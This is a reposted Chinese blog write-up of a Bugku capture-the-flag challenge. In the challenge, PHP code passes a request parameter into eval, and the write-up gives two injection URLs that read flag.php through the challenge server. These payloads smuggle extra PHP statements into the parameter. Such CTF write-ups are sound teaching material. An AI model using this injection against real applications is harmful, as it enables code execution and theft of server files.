1. 首页
  2. 文章中心
  3. Other

bugku本地包含bugku本地包含

65 阅读 0 评论
我是靠谱客的博主 细心歌曲,最近开发中收集的这篇文章主要介绍bugku本地包含bugku本地包含,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

bugku本地包含

题目链接

页面提示:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

代码分析

  1. include “flag.php”: include 语句包含并运行指定文件。
  2. $_REQUEST[‘hello’]: 通过 GET,POST 和 COOKIE 传递参数
  3. var_dump($a) : 输出变量的相关信息
  4. eval(): 把字符串当作命令直接执行
  5. show_source() : 函数对文件进行语法高亮显示。
  6. FILE: 当前文件

方法一:

http://123.206.87.240:8003/?hello=1);print_r(file(%22./flag.php%22));//

相当于:eval( “var_dump(1);print_r(file(”./flag.php"));//);");
eval函数将引号内的字符串作为语句运行,所以//仅注释);

方法二:

http://123.206.87.240:8003/?hello=file('flag.php')

file() 函数把整个文件读入一个数组中。(注意参数是字符串)

最后

以上就是细心歌曲为你收集整理的bugku本地包含bugku本地包含的全部内容,希望文章能够帮你解决bugku本地包含bugku本地包含所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(43)

相关文章

第一个mybatis程序(IDEA)
第一个mybatis程序(IDEA)
文件包含漏洞原理与实践练习题
文件包含漏洞原理与实践练习题
bugku web 8 (文件包含)wp
bugku web 8 (文件包含)wp
bugku 本地包含 writeup
bugku 本地包含 writeup
bugku本地包含bugku本地包含
bugku本地包含bugku本地包含
ctf、本地包含、例1
ctf、本地包含、例1
ctf本地包括_文件包含CTF题目
ctf本地包括_文件包含CTF题目
bugku-文件包含2 writeup文件包含2
bugku-文件包含2 writeup文件包含2

评论列表共有 0 条评论

立即
投稿
返回
顶部